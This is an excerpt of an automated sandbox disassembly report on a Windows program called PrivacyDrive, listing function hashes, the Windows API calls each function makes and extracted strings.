                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameSave_memset
                                • String ID: !@$X
                                • API String ID: 1534219092-4222592482
                                • Opcode ID: 3ce067d345ddd39821ab6f349ea4c35892f0cd05f295f0354a6bba2d33233745
                                • Instruction ID: c4718d24e90160dd7e81a3c53885e8b2e8944d4bd852699be5995abf9a0bf4a4
                                • Opcode Fuzzy Hash: 3ce067d345ddd39821ab6f349ea4c35892f0cd05f295f0354a6bba2d33233745
                                • Instruction Fuzzy Hash: 21A14B70608380CFE774DF24C849B9BBBE5BF95308F104A2EE59987291DB75A418CB97
                                APIs
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4), ref: 004166B0
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004166C8
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 004166F5
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416707
                                  • Part of subcall function 004166A0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH), ref: 00416734
                                  • Part of subcall function 004166A0: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00416746
                                  • Part of subcall function 004169B0: TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 004169B8
                                  • Part of subcall function 004169B0: LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SPLASH), ref: 004169DF
                                • _memmove.LIBCMT ref: 00416B7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$_memmove
                                • String ID: COPYRIGHT_INFORMATION$String$Version.xml
                                • API String ID: 1145044787-240694523
                                • Opcode ID: 60954804e4b2ff68d057d59161eb9795ffbd489a9a02b5732f9179375e6b78ea
                                • Instruction ID: f0b79cddade3e81fb812715542dedb2745c283eaef7473b2f8ddbe8d91f7a391
                                • Opcode Fuzzy Hash: 60954804e4b2ff68d057d59161eb9795ffbd489a9a02b5732f9179375e6b78ea
                                • Instruction Fuzzy Hash: 29A116B06083419FE750CF25C84579BBBE4BF88748F04492EF495C7291EBB8E948CB96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: 3e06d062255209bf364fbaa4e34eda6ee83036db0a724104dc5e9999704779f7
                                • Instruction ID: 419109be963f109e5df0a888b0f0c5a29ee3271ce28584c256a495edffd8ffa3
                                • Opcode Fuzzy Hash: 3e06d062255209bf364fbaa4e34eda6ee83036db0a724104dc5e9999704779f7
                                • Instruction Fuzzy Hash: 2DA11970609380CBE774CF25C988B9BBBE5BF85308F144A2EE58D87291DB75A448CB57
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: a76abb378e13449fdcfafe9f2c3942c33c81c93e09a4c2475f9e85403f6e70ac
                                • Instruction ID: 7dceb69f979cca6fbfed53a16589b53f0021b484a8bb1d32690f29921dc899b6
                                • Opcode Fuzzy Hash: a76abb378e13449fdcfafe9f2c3942c33c81c93e09a4c2475f9e85403f6e70ac
                                • Instruction Fuzzy Hash: 3EA11570608380CBE774CF24C848B9BBBE5BF85308F104A2EE59D87291DB75A458CB97
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %02X$P[$string too long
                                • API String ID: 233258989-3140238815
                                • Opcode ID: 578cadafdf5bdef974289bf4a010da483039d6b53be4da2b58917b0b2a0fc817
                                • Instruction ID: deeda1d00bbab7e01c028f3a80b60ca0d6727138760f4b33598e385c614afaa8
                                • Opcode Fuzzy Hash: 578cadafdf5bdef974289bf4a010da483039d6b53be4da2b58917b0b2a0fc817
                                • Instruction Fuzzy Hash: 8F71C230A00704DBCB34DF28C94566AB7B6FF45716F100A1FE8569B292DB38A949CB59
                                APIs
                                • _memmove.LIBCMT ref: 0040E5A4
                                  • Part of subcall function 004FFB4F: std::exception::exception.LIBCMT ref: 004FFB62
                                  • Part of subcall function 004FFB4F: __CxxThrowException@8.LIBCMT ref: 004FFB77
                                • _memmove.LIBCMT ref: 0040E699
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 1300846289-4289949731
                                • Opcode ID: 26c3fdafe75fd5700024fccce8ccdf70aea2c0196db8092c2fac52977c37c98c
                                • Instruction ID: aa4102e58c6c43286d0ccc458aa3b3cdb30541468fe92a7b965e58d71fef123c
                                • Opcode Fuzzy Hash: 26c3fdafe75fd5700024fccce8ccdf70aea2c0196db8092c2fac52977c37c98c
                                • Instruction Fuzzy Hash: C951D4313006149BCB24DEAEED8086AB7AAFF917543500E3FE545DB390DB35E825C7A8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 64a0c07c99e04949df89832e99d8116ab603dda18bbbef98413db6cc4c0f47db
                                • Instruction ID: a69163b2e96fa2249711881a697165a54b844723daba2c190f5e4f7669f899f2
                                • Opcode Fuzzy Hash: 64a0c07c99e04949df89832e99d8116ab603dda18bbbef98413db6cc4c0f47db
                                • Instruction Fuzzy Hash: E05172317003099BCF24DE28C98489E77B6FF85304724893FE8559B390D739E966CB9A
                                APIs
                                • SetForegroundWindow.USER32(00000000), ref: 0046628C
                                • SetActiveWindow.USER32(00000000), ref: 004662A6
                                • SetFocus.USER32(00000000), ref: 004662C0
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtualWindow$ActiveFocusForeground
                                • String ID: 1u
                                • API String ID: 2697890781-2817233150
                                • Opcode ID: fdb71d3ed828612fed05d932ae2677de9f0da05e9d6dd450146f6a7cbc748e72
                                • Instruction ID: a87d1e2915a41647f854ad2c7d0632d5b1ebbb119fa8b5f8ed265caea2f7a64d
                                • Opcode Fuzzy Hash: fdb71d3ed828612fed05d932ae2677de9f0da05e9d6dd450146f6a7cbc748e72
                                • Instruction Fuzzy Hash: DF611C349012188BDB54EF65C869BAEB3B1FF45308F1181EED80AA7391DB795E84CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: a38f51fdbcb7fc8cbabbf669187ea15d033308ed89bf1e9eb2928f85d647ad00
                                • Instruction ID: e84c8c1b7a242fcf4444dc66b52b8ffc4820d3b1c0752855002ef9397a27b2dd
                                • Opcode Fuzzy Hash: a38f51fdbcb7fc8cbabbf669187ea15d033308ed89bf1e9eb2928f85d647ad00
                                • Instruction Fuzzy Hash: 7B71F8B1D00368CAEB31DF54CD4C78ABBB5BB04308F1085EAD50DA6292D7B95B88DF95
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B069C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B07D9
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0812
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [
                                • API String ID: 2222842502-2256786511
                                • Opcode ID: 322bef3801a2dbbe8944f4fa0cade74a7eaaa0be029c2669c8f392c14047479d
                                • Instruction ID: e8331ff369a23e48e85c885c1b2399a239b9e469568beb0b79f2965cedccf8cb
                                • Opcode Fuzzy Hash: 322bef3801a2dbbe8944f4fa0cade74a7eaaa0be029c2669c8f392c14047479d
                                • Instruction Fuzzy Hash: 14516C74600300DFD714DB58C996FA6B7A5FB48704F1845BEEA0A9B392DB747804CBA9
                                APIs
                                • _memset.LIBCMT ref: 004C12EA
                                • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0056C40C,?,00000001,00000000,00000000,0056C40C,?,00000001), ref: 004C13C9
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8FullNamePathThrow_memsetstd::exception::exception
                                • String ID: !@$invalid string position
                                • API String ID: 12894150-4214978026
                                • Opcode ID: 896a792ceaf226620ef751836e4b23eb6f03d61a4e2059098aef535d7957c07b
                                • Instruction ID: c29c8f85dea9c510691d525036f1e75d0a9a6a17f5f625b3f52d4179c928aac1
                                • Opcode Fuzzy Hash: 896a792ceaf226620ef751836e4b23eb6f03d61a4e2059098aef535d7957c07b
                                • Instruction Fuzzy Hash: 2B418F7595021C9ADB20DF55CC99BDAB7B8FF54708F0042EEE409A32A1EB786B84CF54
                                APIs
                                • _memmove.LIBCMT ref: 004098A0
                                  • Part of subcall function 0040C5C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000003,000000FF,00000000,00000000,00000000,?,004098D4,?,?,?,7563D392), ref: 0040C5D2
                                  • Part of subcall function 0040C5C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000003,000000FF,00000000,00000000,00000000,?,?,?,7563D392), ref: 0040C60A
                                  • Part of subcall function 0040AB40: __CxxThrowException@8.LIBCMT ref: 0040AC74
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$Exception@8Throw_memmove
                                • String ID: PrivacyDrive$Resources.cpp$version.xml
                                • API String ID: 1655515822-3231829631
                                • Opcode ID: 09c432cc8bc17ed105025b1ced06dc70fbb4c7c60ae0ce764be7f3f363f22b14
                                • Instruction ID: a01211494afbd47c385bde3860801278259c4b7d71102fddeb9bbb3aafefded4
                                • Opcode Fuzzy Hash: 09c432cc8bc17ed105025b1ced06dc70fbb4c7c60ae0ce764be7f3f363f22b14
                                • Instruction Fuzzy Hash: 843193B1D006169BDB11DBA48C41BAFBBB8BB45724F10022AE515B33C2E7795D0087A5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 4[P[$invalid string position$string too long
                                • API String ID: 4104443479-1793273408
                                • Opcode ID: 5ba828849452866fc430d5270b53255cbd8e7eeb9c6e05534721bd49bef666e8
                                • Instruction ID: ce345729adc13b09cb700357da100de0f7ed5ff6fb81674761350112ea965b83
                                • Opcode Fuzzy Hash: 5ba828849452866fc430d5270b53255cbd8e7eeb9c6e05534721bd49bef666e8
                                • Instruction Fuzzy Hash: 4921C331700304DBDB28AE6ED880A5ABBA9EF41755B14093FE955CB382C775E948C798
                                APIs
                                • wsprintfW.USER32 ref: 004A584E
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • DeviceIoControl.KERNEL32(00000000,07770C2C,00000000,00000000,005BE2B4,00000004,?,00000000), ref: 004A58B2
                                Strings
                                • \\.\GLOBAL\PrivacyDrive, xrefs: 004A5848
                                Similarity
                                • API ID: ControlCreateDeviceFilewsprintf
                                • String ID: \\.\GLOBAL\PrivacyDrive
                                • API String ID: 3081802084-2067765968
                                • Opcode ID: 36b57c087ed921fed0b425d01f848104bd70bf0e57617e5c80806c4489384c58
                                • Instruction ID: 7494380c5ccbca812f687041f90896b0c0ce1ffadd146c2848c592cade095b54
                                • Opcode Fuzzy Hash: 36b57c087ed921fed0b425d01f848104bd70bf0e57617e5c80806c4489384c58
                                • Instruction Fuzzy Hash: 5211CA34741308ABEF24DB74DD16FBA73A8EF15715F10456EBA16D72C0DE7469088B44
                                APIs
                                • _memset.LIBCMT ref: 00485A11
                                • SHGetFileInfoW.SHELL32(?,000000FF,?,000002B4,00000400), ref: 00485A30
                                Strings
                                Similarity
                                • API ID: FileInfo_memset
                                • String ID: C:\$^>I
                                • API String ID: 2638500827-3074060033
                                • Opcode ID: f5d7f28e7ae0b51361e2dc37912bccf15cf9c2aa788c0c33e1dd5c2b0c4abe3f
                                • Instruction ID: 7cc8e9ee1074bd9663a0f1968d0639b28c62d87573a87140512be5bc3e8c282c
                                • Opcode Fuzzy Hash: f5d7f28e7ae0b51361e2dc37912bccf15cf9c2aa788c0c33e1dd5c2b0c4abe3f
                                • Instruction Fuzzy Hash: 2811A731B00218ABDB10EBA5DC46FADB7B8EB44714F0042BBF908D72D0EA746A44DB84
                                APIs
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,004AF444), ref: 004AEB60
                                • LocalFree.KERNEL32(00000000), ref: 004AEB9C
                                • LocalFree.KERNEL32(00000000), ref: 004AEBC7
                                Strings
                                Similarity
                                • API ID: FreeLocal$FormatMessage
                                • String ID: 0026
                                • API String ID: 803548167-3620602821
                                • Opcode ID: 4f28324bbeb6e20af9e7cd83a43d30934ef9b69ba64b6d07cfa8f98e51e6d176
                                • Instruction ID: 7a06000c86aeb33bb578875d5468381478c41e39b497c2d58616c8b13f67acd7
                                • Opcode Fuzzy Hash: 4f28324bbeb6e20af9e7cd83a43d30934ef9b69ba64b6d07cfa8f98e51e6d176
                                • Instruction Fuzzy Hash: 4E01D6317803147BEB309B44EC0BFAA7A68DB01B62F100255FE05B62E0F6B16D50A795
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,0053A0F8,000000FF), ref: 0042463D
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,0053A0F8,000000FF), ref: 00424655
                                • GdipDeleteStringFormat.GDIPLUS(00000000, - - - -,00000000,00000000,?,?,00000000,?,FF323232), ref: 004246B2
                                Strings
                                Similarity
                                • API ID: FormatGdipString$AlignCreateDeleteLine
                                • String ID: - - - -
                                • API String ID: 2084024313-344715758
                                • Opcode ID: 97e33a1792a53acda723ecc13f237b07042b9f0a6aa92eccae55c5c72e4364c0
                                • Instruction ID: cf0d635ac4439fc5101e54e632b722e79c54ec9e93b75e42b6859e8e9b21946c
                                • Opcode Fuzzy Hash: 97e33a1792a53acda723ecc13f237b07042b9f0a6aa92eccae55c5c72e4364c0
                                • Instruction Fuzzy Hash: A8219A75208342EFC714CF14CC05F9ABBE8FB89720F004A2EB9A5922D0EB74A508CB56
                                APIs
                                • CloseHandle.KERNEL32(?,7563D392,00000002,<,X,00000000,005499CE,000000FF,?,0041D91F), ref: 004A57A3
                                • DeleteCriticalSection.KERNEL32(?,7563D392,00000002,<,X,00000000,005499CE,000000FF,?,0041D91F), ref: 004A57C6
                                Strings
                                Similarity
                                • API ID: CloseCriticalDeleteHandleSection
                                • String ID: <,X$<,X
                                • API String ID: 1370521891-3556952042
                                • Opcode ID: de776cba25faf2730d988c9ba960061ed55d5fb4e8effe73e671f8035add70eb
                                • Instruction ID: 8c59a083403ac473de118185c29afedb6f71d19fe6a6320f31f613d6141e5874
                                • Opcode Fuzzy Hash: de776cba25faf2730d988c9ba960061ed55d5fb4e8effe73e671f8035add70eb
                                • Instruction Fuzzy Hash: 1B11A0B5904718EBDB20CF54C90879EBBF8FB15724F108B1EE865933C0D7B9AA048B84
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 0041CB91
                                • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000004,00000004,?,?,00000000,00020019,?), ref: 0041CBB6
                                • RegCloseKey.ADVAPI32(?,?,00000000,00020019,?), ref: 0041CBCF
                                Strings
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Start
                                • API String ID: 3677997916-1589148299
                                • Opcode ID: 3826f259bfbeb2682d6ba904f0090098df3d3910d28e1a3ede899ecdc063f863
                                • Instruction ID: 60634d18d2b34d08243063aef7d1045a78b31859e97de2cd2e60992242298721
                                • Opcode Fuzzy Hash: 3826f259bfbeb2682d6ba904f0090098df3d3910d28e1a3ede899ecdc063f863
                                • Instruction Fuzzy Hash: B5F01D7094121CFBDB118F90DC4AEEABB6CEB14755F104066FD04D2150D2719E58DBD0
                                APIs
                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000000), ref: 00413141
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413158
                                Strings
                                Similarity
                                • API ID: ExecuteFileInfoShell
                                • String ID: :\$open
                                • API String ID: 1133623499-1518230227
                                • Opcode ID: 32030abe5b6b5a0b7e82afceee751789d6d9b24d76d1d0de1a37681a463aeea6
                                • Instruction ID: b7703ac5843652f046152170b7ecde8b283b9c93cdaa8f15a7c76f12125bb424
                                • Opcode Fuzzy Hash: 32030abe5b6b5a0b7e82afceee751789d6d9b24d76d1d0de1a37681a463aeea6
                                • Instruction Fuzzy Hash: 07F0E175E4030CABEB00DF94DC96F9DB7B8BB18704F008456FA05DB290D6B46A04DB55
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000001,_Privacy Drive UI,?,0040FD27), ref: 0042B9A3
                                • GetLastError.KERNEL32(?,0040FD27), ref: 0042B9B2
                                • CloseHandle.KERNEL32(?,0040FD27), ref: 0042B9C5
                                Strings
                                Similarity
                                • API ID: CloseCreateErrorHandleLastMutex
                                • String ID: _Privacy Drive UI
                                • API String ID: 4294037311-2587878715
                                • Opcode ID: 96e8bc22e1efc1a7884ccdf22b9db723226ea2e679a83071e2ca0c449a83962e
                                • Instruction ID: f5842279c6bb8cc4d488050af91dd673a3f740bef71acf62abc57e123ad988ee
                                • Opcode Fuzzy Hash: 96e8bc22e1efc1a7884ccdf22b9db723226ea2e679a83071e2ca0c449a83962e
                                • Instruction Fuzzy Hash: 95E0923770823187E7916B14BC4878A7BB0E725B23F000023F504D16A1D7669CC6B7E0
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00540118,000000FF), ref: 0044127F
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 00441386
                                  • Part of subcall function 004CC050: GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                  • Part of subcall function 004CC050: GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                  • Part of subcall function 004CC050: GdipDeleteBrush.GDIPLUS(?,?,?,?), ref: 004CC1A9
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,00000000,?,?,00000016,?,FF414141,?,00000000,?,?,00000016,?,FF414141), ref: 00441865
                                • GdipDeleteStringFormat.GDIPLUS(?,?,0000007E,00000036,?,00000016,?,FF414141), ref: 004418BF
                                Similarity
                                • API ID: Gdip$String$Format$AlignCreateDeleteDraw$BrushFillSolid
                                • String ID:
                                • API String ID: 1713294839-0
                                • Opcode ID: 0bdef8727a6907d0153510461fa6637eb7a5a1145e2b71ab58448d540323ba17
                                • Instruction ID: 5ba4bf7f39ff79144ff88382843ad214eba5f59aea84957b257ca6e8f98e291d
                                • Opcode Fuzzy Hash: 0bdef8727a6907d0153510461fa6637eb7a5a1145e2b71ab58448d540323ba17
                                • Instruction Fuzzy Hash: 222225B5204702EFD714CF28C884E96BBE8FF59364F04461EF8A8972A1D734E954CBA5
                                APIs
                                • DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • DeviceIoControl.KERNEL32(?,07770C84,?,00000295,?,00000295,?,00000000), ref: 004A7481
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A74A0
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                Similarity
                                • API ID: ControlDeviceMessagePeek$_malloc
                                • String ID:
                                • API String ID: 706846246-0
                                • Opcode ID: a33365cb78780a06058904eb9aa3c6e270a0e606a8900395005601a07d047d99
                                • Instruction ID: 3249e15b07e49eda3519ea353384b7fef2f1e193b73757c876742ef21707c496
                                • Opcode Fuzzy Hash: a33365cb78780a06058904eb9aa3c6e270a0e606a8900395005601a07d047d99
                                • Instruction Fuzzy Hash: 29518171A40318ABDB10DF94CC49BEEBBB8FF19714F14412AE904BB2C0D7B59944CBA5
                                Similarity
                                • API ID: CriticalSection$MessagePeek$EnterLeave$ControlDevice
                                • String ID:
                                • API String ID: 1761629311-0
                                • Opcode ID: 50eb8d550ca9fab826c1c576e8405ead69e538d43f3e1a971e56d8a460e38ef5
                                • Instruction ID: 3f2fff9c139d75d78497a8398bee76ca9fda80a0dbc039c50f9e302af8190350
                                • Opcode Fuzzy Hash: 50eb8d550ca9fab826c1c576e8405ead69e538d43f3e1a971e56d8a460e38ef5
                                • Instruction Fuzzy Hash: BC51BF306187019FD724DF26D847BAAB7E4FF59318F140A2EE45AA22D1EB387814CB56
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004483E6
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00448404
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0044841C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000014,?,FF414141,?,00000000,?,?,00000014,?,FF414141,?), ref: 00448505
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: 9284a02a76feb8575200f451f57aa82c024adf050106ac514a1b3fb2f394b86b
                                • Instruction ID: 3aa694b5bc46787fb8de9f3df625cf2318682f59eeca7f70602fcc19d3cd1175
                                • Opcode Fuzzy Hash: 9284a02a76feb8575200f451f57aa82c024adf050106ac514a1b3fb2f394b86b
                                • Instruction Fuzzy Hash: 7D518B71204702EFE704CF28C884F9ABBE4FF99714F044A1DF559972A1DB70A858CBA5
                                APIs
                                • GdipCreateSolidFill.GDIPLUS(?,FF414141,7563D392,?,?,?), ref: 004CC0A9
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?,?), ref: 004CC121
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,?,?), ref: 004CC18D
                                • GdipDeleteBrush.GDIPLUS(?,?,?,?), ref: 004CC1A9
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DrawString$BrushCreateDeleteFillSolid
                                • String ID:
                                • API String ID: 4101622418-0
                                • Opcode ID: a057df0e225cbec0be139d0a3cd83048824a49fd74ded992ac97cc4dc7caadf8
                                • Instruction ID: e0038b9d0685308181ed090feaf07842e71fd62a4c13406fe1d76e7a4da1b15f
                                • Opcode Fuzzy Hash: a057df0e225cbec0be139d0a3cd83048824a49fd74ded992ac97cc4dc7caadf8
                                • Instruction Fuzzy Hash: 30413B75A11249DFCB01CF65C880AAEFBB4FF99310F24831AE815B7290E774A894DF54
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000108,7563D392,?,00000000,00549910,000000FF), ref: 004A4655
                                • GdipSetStringFormatAlign.GDIPLUS(00000108,00000001), ref: 004A4775
                                • GdipSetStringFormatLineAlign.GDIPLUS(00000108,00000001), ref: 004A4786
